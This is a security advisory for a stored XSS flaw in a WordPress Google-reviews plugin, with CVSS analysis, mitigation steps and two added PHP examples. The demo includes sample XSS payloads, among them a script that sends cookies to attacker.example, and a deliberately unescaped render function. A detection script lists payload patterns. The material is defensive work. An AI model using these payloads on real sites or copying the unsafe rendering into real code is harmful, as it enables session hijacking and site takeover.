Overview
CVE-2025-12499 is a high-severity stored Cross-Site Scripting (XSS) vulnerability in the Rich Shortcodes for Google Reviews plugin for WordPress, affecting all versions up to and including 6.8. It lets an unauthenticated attacker inject JavaScript into pages that display the site's Google reviews by placing the payload in the review content itself; the script then runs in the browser of anyone who views the page, which can lead to account takeover and loss of site integrity. Version 6.6.2 only partially addressed the issue, and the complete fix did not arrive until a later release, so update immediately to the latest available version.
Technical Details
The Rich Shortcodes for Google Reviews plugin fetches review data from Google and renders it on the WordPress site without adequate sanitization or output escaping. Review text and reviewer names are third-party input that arrives over the network, but the plugin writes them into the page as if they were trusted markup. An attacker therefore crafts a Google review containing JavaScript (or an HTML element with an event handler); when the plugin fetches and displays that review, the payload executes in the browser of every visitor to the page, including logged-in administrators. The attacker needs no account or privilege on the WordPress installation: being able to post a review on Google for the business whose reviews the site displays is the only precondition, and because the review is stored on Google's side and re-fetched by the plugin, the payload persists until the review is removed.
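The pattern behind this class of bug and its fix, as an added example rather than the plugin's own code: the unsafe function concatenates fields straight from a review API response into HTML, while the hardened one escapes each value for the context it lands in. The field names and the review payload are constructed for the demonstration; plain PHP escaping functions are used so the file runs stand-alone, and the comments name the WordPress equivalents a plugin would call.

```php
<?php
// Added example, not code from the Rich Shortcodes for Google Reviews plugin.
// A fetched review is attacker-controlled text from a third party and must be
// treated exactly like untrusted user input at render time.

// Constructed sample of what a review API response might carry (field names
// are hypothetical). The values are typical stored-XSS probes.
$review = [
    'author_name' => 'Jane <img src=x onerror="alert(document.cookie)">',
    'rating'      => 5,
    'text'        => 'Great place! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'author_url'  => 'javascript:alert(1)',
];

// VULNERABLE: API data concatenated straight into markup. Every field is an
// injection point: the href attribute, the link text and the review body.
function render_review_unsafe(array $r): string
{
    return '<div class="review">'
        . '<a href="' . $r['author_url'] . '">' . $r['author_name'] . '</a>'
        . ' (' . $r['rating'] . '/5): ' . $r['text']
        . '</div>';
}

// HARDENED: escape for the exact output context. In WordPress use esc_html()
// for text nodes, esc_attr() for attribute values, esc_url() for href/src and
// wp_kses_post() when a limited HTML subset must be allowed. Plain PHP
// equivalents are used here so this file runs without WordPress loaded.
function esc_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function esc_href(string $url): string
{
    // Attribute escaping alone does not stop javascript: or data: URLs in an
    // href, so the scheme is allow-listed first and anything else is dropped.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return esc_text($url);
}

function render_review_safe(array $r): string
{
    $href = esc_href((string) $r['author_url']);
    $name = esc_text((string) $r['author_name']);
    $link = $href === '' ? $name : '<a href="' . $href . '">' . $name . '</a>';
    return '<div class="review">'
        . $link
        . ' (' . (int) $r['rating'] . '/5): ' . esc_text((string) $r['text'])
        . '</div>';
}

echo "Unsafe:\n", render_review_unsafe($review), "\n\n";
echo "Safe:\n",   render_review_safe($review),   "\n";
```

Run with `php render.php`: the unsafe output contains a live `<script>` element and an `<img onerror>` handler, the safe output contains only `&lt;script&gt;` text and no link at all because the `javascript:` URL failed the scheme check. Escaping at output time is the right layer; sanitizing only when the review is fetched leaves any data cached before the fix still dangerous.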
CVSS Analysis
- CVE ID: CVE-2025-12499
- Severity: HIGH
- CVSS Score: 7.2
- CVSS Vector: the exact vector is not reproduced here. With the metrics discussed below, the CVSS 3.1 vector that produces a base score of 7.2 is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N; the same vector with UI:R instead scores 6.1, so a 7.2 rating implies no user interaction.
A CVSS 3.1 base score of 7.2 is rated High. AV:N (Network) means the attack is launched remotely; AC:L (Low) means it needs no special conditions or race; PR:N (None) means the attacker holds no privileges on the WordPress site, consistent with the unauthenticated path through a Google review; UI:N (None) is the usual scoring for stored XSS, because the victim does nothing beyond loading a page that displays the review. S:C (Scope Changed) records that a flaw in the plugin ends up executing code in the visitor's browser, a different security authority, which is what lifts this above a same-scope XSS. C:L and I:L reflect limited confidentiality and integrity impact (the attacker acts within the victim's session and alters what the page shows), and A:N reflects no availability impact.
Possible Impact
Successful exploitation of this vulnerability can have severe consequences, including:
- Account Compromise: the script runs with the rights of whoever is viewing the page. WordPress sets its authentication cookies HttpOnly, so the realistic takeover path is not cookie theft but the script acting as the logged-in user, for example calling the REST API with the page's nonce as an administrator to create a new administrator account or install a plugin.
- Malware Distribution: the script can redirect visitors to attacker-controlled sites or load drive-by download content.
- Defacement: the script can rewrite the page's content in the visitor's browser, damaging the site's reputation.
- Phishing: the script can inject a fake login or payment form into a trusted page, tricking users into revealing usernames, passwords or card details.
Mitigation or Patch Steps
The most effective mitigation is to update the Rich Shortcodes for Google Reviews plugin to the latest available version. Versions up to and including 6.8 are affected, and 6.6.2 only partially addressed the issue, so confirm that the installed version is greater than 6.8 after updating. To update:
- Log in to your WordPress admin dashboard.
- Navigate to “Plugins” -> “Installed Plugins.”
- Locate the “Rich Shortcodes for Google Reviews” plugin.
- If an update is available, click the “Update Now” link.
If you cannot update immediately, deactivate the plugin until you can, since any page that renders reviews is exposed while it is active. After updating, also deal with review data the plugin has already fetched: if the fix sanitizes reviews when they are fetched rather than when they are rendered, data cached before the update is still dangerous, so purge or refresh the stored reviews and inspect them for script tags or event-handler attributes. A site owner cannot delete a review on Google's side, so a malicious review should also be reported to Google so that it is not fetched again.
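The version check and the cache inspection from the steps above, as an added example that is not from the page or the plugin vendor. It runs stand-alone on the constructed sample data below, and when executed inside WordPress with `wp eval-file check.php` it additionally reads the real plugin version, scans the options table and deactivates the plugin if it is still at or below 6.8. The plugin's main file path and the sample option names are assumptions; confirm the real path with `wp plugin list`.

```php
<?php
// Added example, not the plugin's own code. Stand-alone: checks the constructed
// samples. Under WordPress (wp eval-file): checks the real install.

const LAST_AFFECTED = '6.8';   // advisory: every version <= 6.8 is vulnerable

// Assumed plugin main-file path; verify with `wp plugin list` before relying on it.
const PLUGIN_FILE = 'rich-shortcodes-for-google-reviews/rich-shortcodes-for-google-reviews.php';

// True only for versions strictly newer than the last affected one.
// version_compare() orders '6.10' after '6.8' and '6.8.1' after '6.8' correctly,
// which a plain string or float comparison would not.
function is_patched(string $installed): bool
{
    return version_compare($installed, LAST_AFFECTED, '>');
}

// Return the keys whose stored value looks like an XSS payload. Serialized
// arrays are searched as text so nested review fields are covered. These are
// the common probes; no hit is not proof of a clean cache.
function find_payloads(array $stored): array
{
    $patterns = [
        '/<script\b/i',
        '/\bon[a-z]+\s*=/i',              // onerror=, onload=, onmouseover=
        '/javascript\s*:/i',
        '/<(iframe|svg|object|embed)\b/i',
    ];
    $hits = [];
    foreach ($stored as $key => $value) {
        $text = is_string($value) ? $value : serialize($value);
        foreach ($patterns as $re) {
            if (preg_match($re, $text)) {
                $hits[] = $key;
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample of cached review data; option names are made up.
$sample = [
    'rsgr_reviews_cache' => serialize([
        ['author' => 'Alice', 'text' => 'Lovely staff, five stars.'],
        ['author' => 'Bob <img src=x onerror=alert(1)>', 'text' => 'ok'],
    ]),
    'rsgr_place_id' => 'ChIJ-constructed-place-id',
    'unrelated'     => 'nothing to see here',
];

foreach (['6.6.2', '6.8', '6.8.1', '6.10'] as $v) {
    printf("%-6s patched: %s\n", $v, is_patched($v) ? 'yes' : 'NO');
}
printf("sample options flagged: %s\n", implode(', ', find_payloads($sample)) ?: 'none');

if (defined('ABSPATH')) {
    // Running inside WordPress via `wp eval-file`.
    global $wpdb;
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    $data    = get_plugin_data(WP_PLUGIN_DIR . '/' . PLUGIN_FILE, false, false);
    $version = $data['Version'] ?? '';
    printf("installed version: %s\n", $version === '' ? 'not found' : $version);

    // Generic hunt across the options table: the plugin's own storage key is
    // not known here, so every option containing a '<' is inspected.
    $rows   = $wpdb->get_results("SELECT option_name, option_value FROM {$wpdb->options} WHERE option_value LIKE '%<%'", ARRAY_A);
    $stored = array_column($rows, 'option_value', 'option_name');
    printf("options flagged: %s\n", implode(', ', find_payloads($stored)) ?: 'none');

    if ($version !== '' && !is_patched($version)) {
        deactivate_plugins(PLUGIN_FILE);
        echo "plugin still at or below " . LAST_AFFECTED . ", deactivated\n";
    }
}
```

Stand-alone, the version loop reports 6.6.2 and 6.8 as not patched and 6.8.1 and 6.10 as patched, and `rsgr_reviews_cache` is the only sample key flagged. Inside WordPress, a flagged option name tells you which stored data to purge or refresh before trusting the rendered reviews again.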